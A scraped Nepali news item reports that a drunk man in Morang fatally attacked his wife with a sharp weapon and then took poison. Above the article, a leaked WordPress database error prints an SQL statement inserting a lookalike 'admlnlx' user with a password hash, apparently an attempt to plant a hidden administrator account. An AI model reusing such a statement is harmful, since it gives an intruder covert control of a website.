WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3q6xks0vz0oAd/Epm9kWlCtQekvbh/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 06:46:50', '', 'admlnlx', 'admlnlx')
विराटनगर, माघ २७-
मोरङको सिजुवामा एक युवकले धारिलो हतियार प्रहार गरी आफ्नी श्रीमतीको हत्या गरेका छन् ।
मादक पदार्थ सेवन गरेका स्थानीय उदय सुतिहारले हिजो साँझ बासिलाले प्रहार गरेको प्रहरीले जनाएको छ । गम्भीर घाइते भएकी उनकी श्रीमती शान्ता सुतिहारको उपचारका क्रममा रंगेलीस्थित अस्पतालमा मृत्यु भएको थियो । घटनापछि ती युवकले विष सेवन गरेका थिए । उनको विराटनगरस्थित कोसी अञ्चल अस्पतालमा उपचार भइरहेको प्रहरीले जनाएको छ ।